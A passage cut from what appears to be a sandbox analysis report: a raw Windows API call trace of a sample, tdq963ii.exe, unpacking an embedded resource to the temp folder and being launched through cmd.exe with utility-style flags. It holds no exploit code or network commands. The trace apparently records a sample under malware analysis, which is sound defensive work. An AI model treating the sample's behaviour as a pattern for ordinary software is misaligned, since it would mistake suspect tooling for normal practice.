¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇ\x1e\x1c|äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0195.940] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x80) returned 0x5c8250 [0195.959] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0195.959] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0195.960] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8250) returned 0x80 [0195.960] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0195.960] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0195.960] GetCurrentProcess () returned 0xffffffff [0195.960] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0195.961] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0195.961] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0195.963] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0195.963] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0195.963] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0195.963] LockResource (hResData=0x43c648) returned 0x43c648 [0195.963] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c82d8 [0195.964] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0196.694] GetLastError () returned 0x20 [0196.694] GetLastError () returned 0x20 [0196.694] SetLastError (dwErrCode=0x20) [0196.695] GetLastError () returned 0x20 [0196.695] SetLastError (dwErrCode=0x20) [0196.695] GetLastError () returned 0x20 [0196.695] SetLastError (dwErrCode=0x20) [0196.696] GetLastError () returned 0x20 [0196.696] SetLastError (dwErrCode=0x20) [0196.696] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1000) returned 0x5c9820 [0196.697] GetLastError () returned 0x20 [0196.697] SetLastError (dwErrCode=0x20) [0196.697] GetLastError () returned 0x20 [0196.697] SetLastError (dwErrCode=0x20) [0196.697] GetLastError () returned 0x20 [0196.697] SetLastError (dwErrCode=0x20) [0196.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0196.697] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0196.700] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7820 | out: hHeap=0x5b0000) returned 1 [0196.700] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0196.700] ExitProcess (uExitCode=0x1) [0196.701] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c60c8 | out: hHeap=0x5b0000) returned 1 Process: id = "190" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x284d4000" os_pid = "0x708" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "150" os_parent_pid = "0x598" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 735 os_tid = 0xa40 [0194.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x38f9ac | out: lpSystemTimeAsFileTime=0x38f9ac*(dwLowDateTime=0x2d0505a0, dwHighDateTime=0x1d68287)) [0194.498] GetCurrentProcessId () returned 0x708 [0194.498] GetCurrentThreadId () returned 0xa40 [0194.498] GetTickCount () returned 0x115d0d7 [0194.498] QueryPerformanceCounter (in: lpPerformanceCount=0x38f9a4 | out: lpPerformanceCount=0x38f9a4*=31483708117) returned 1 [0194.500] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0194.500] __set_app_type (_Type=0x1) [0194.500] __p__fmode () returned 0x770331f4 [0194.500] __p__commode () returned 0x770331fc [0194.500] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0194.500] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0194.500] GetCurrentThreadId () returned 0xa40 [0194.500] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa40) returned 0x60 [0194.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.501] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0194.501] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.502] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0194.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f93c | out: phkResult=0x38f93c*=0x0) returned 0x2 [0194.502] VirtualQuery (in: lpAddress=0x38f973, lpBuffer=0x38f90c, dwLength=0x1c | out: lpBuffer=0x38f90c*(BaseAddress=0x38f000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.502] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x38f90c, dwLength=0x1c | out: lpBuffer=0x38f90c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0194.502] VirtualQuery (in: lpAddress=0x291000, lpBuffer=0x38f90c, dwLength=0x1c | out: lpBuffer=0x38f90c*(BaseAddress=0x291000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0194.502] VirtualQuery (in: lpAddress=0x293000, lpBuffer=0x38f90c, dwLength=0x1c | out: lpBuffer=0x38f90c*(BaseAddress=0x293000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.502] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x38f90c, dwLength=0x1c | out: lpBuffer=0x38f90c*(BaseAddress=0x390000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0194.502] GetConsoleOutputCP () returned 0x1b5 [0194.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0194.503] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0194.503] _get_osfhandle (_FileHandle=1) returned 0x80 [0194.503] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0194.503] _get_osfhandle (_FileHandle=1) returned 0x80 [0194.503] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0194.503] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.503] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0194.503] GetEnvironmentStringsW () returned 0x4821c8* [0194.504] GetProcessHeap () returned 0x470000 [0194.504] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x482d50 [0194.504] FreeEnvironmentStringsW (penv=0x4821c8) returned 1 [0194.504] GetProcessHeap () returned 0x470000 [0194.504] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x4818a8 [0194.504] GetEnvironmentStringsW () returned 0x4821c8* [0194.504] GetProcessHeap () returned 0x470000 [0194.504] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x4838d8 [0194.505] FreeEnvironmentStringsW (penv=0x4821c8) returned 1 [0194.505] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38e8ac | out: phkResult=0x38e8ac*=0x68) returned 0x0 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x0, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x1, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x1, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x0, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x40, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x40, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.505] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x40, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.505] RegCloseKey (hKey=0x68) returned 0x0 [0194.506] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38e8ac | out: phkResult=0x38e8ac*=0x68) returned 0x0 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x40, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x1, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x1, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x0, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x9, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x4, lpData=0x38e8b8*=0x9, lpcbData=0x38e8b0*=0x4) returned 0x0 [0194.506] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38e8b4, lpData=0x38e8b8, lpcbData=0x38e8b0*=0x1000 | out: lpType=0x38e8b4*=0x0, lpData=0x38e8b8*=0x9, lpcbData=0x38e8b0*=0x1000) returned 0x2 [0194.506] RegCloseKey (hKey=0x68) returned 0x0 [0194.506] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2de [0194.506] srand (_Seed=0x5f51e2de) [0194.506] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner" [0194.506] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner" [0194.507] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0194.508] GetProcessHeap () returned 0x470000 [0194.508] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x4821c8 [0194.508] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4821d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0194.508] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.509] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0194.509] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.509] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.509] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0194.509] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0194.509] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0194.509] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0194.509] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0194.509] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0194.509] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0194.509] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0194.509] GetProcessHeap () returned 0x470000 [0194.509] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x4823e0 [0194.509] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x38f678 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0194.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x38f678, lpFilePart=0x38f674 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38f674*="Desktop") returned 0x25 [0194.510] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0194.510] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x38f3f4 | out: lpFindFileData=0x38f3f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x482048 [0194.510] FindClose (in: hFindFile=0x482048 | out: hFindFile=0x482048) returned 1 [0194.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x38f3f4 | out: lpFindFileData=0x38f3f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x482048 [0194.510] FindClose (in: hFindFile=0x482048 | out: hFindFile=0x482048) returned 1 [0194.510] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0194.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x38f3f4 | out: lpFindFileData=0x38f3f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x482048 [0194.511] FindClose (in: hFindFile=0x482048 | out: hFindFile=0x482048) returned 1 [0194.511] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0194.511] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0194.511] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0194.511] GetProcessHeap () returned 0x470000 [0194.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482d50 | out: hHeap=0x470000) returned 1 [0194.511] GetEnvironmentStringsW () returned 0x484460* [0194.511] GetProcessHeap () returned 0x470000 [0194.511] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x482c40 [0194.511] FreeEnvironmentStringsW (penv=0x484460) returned 1 [0194.511] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0194.511] GetProcessHeap () returned 0x470000 [0194.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4823e0 | out: hHeap=0x470000) returned 1 [0194.511] GetProcessHeap () returned 0x470000 [0194.512] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x484460 [0194.512] GetProcessHeap () returned 0x470000 [0194.512] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x6a) returned 0x4837c8 [0194.512] GetProcessHeap () returned 0x470000 [0194.512] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484460 | out: hHeap=0x470000) returned 1 [0194.512] GetConsoleOutputCP () returned 0x1b5 [0194.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0194.513] GetUserDefaultLCID () returned 0x409 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x38f7b8, cchData=128 | out: lpLCData="0") returned 2 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x38f7b8, cchData=128 | out: lpLCData="0") returned 2 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x38f7b8, cchData=128 | out: lpLCData="1") returned 2 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0194.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0194.515] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0194.515] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0194.517] GetProcessHeap () returned 0x470000 [0194.517] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x484460 [0194.517] GetConsoleTitleW (in: lpConsoleTitle=0x484460, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.038] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0195.038] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0195.038] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0195.040] GetProcessHeap () returned 0x470000 [0195.040] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x484678 [0195.040] GetProcessHeap () returned 0x470000 [0195.040] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484678 | out: hHeap=0x470000) returned 1 [0195.042] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0195.042] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0195.042] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0195.042] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0195.042] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0195.042] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0195.042] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0195.042] GetProcessHeap () returned 0x470000 [0195.042] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x4823e0 [0195.042] GetProcessHeap () returned 0x470000 [0195.042] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x22) returned 0x483840 [0195.044] GetProcessHeap () returned 0x470000 [0195.044] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4e) returned 0x483870 [0195.046] GetConsoleTitleW (in: lpConsoleTitle=0x38f4b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.047] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0195.047] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0195.047] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0195.047] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0195.047] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0195.048] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0195.049] _wcsicmp (_String1="tdq963ii.exe", 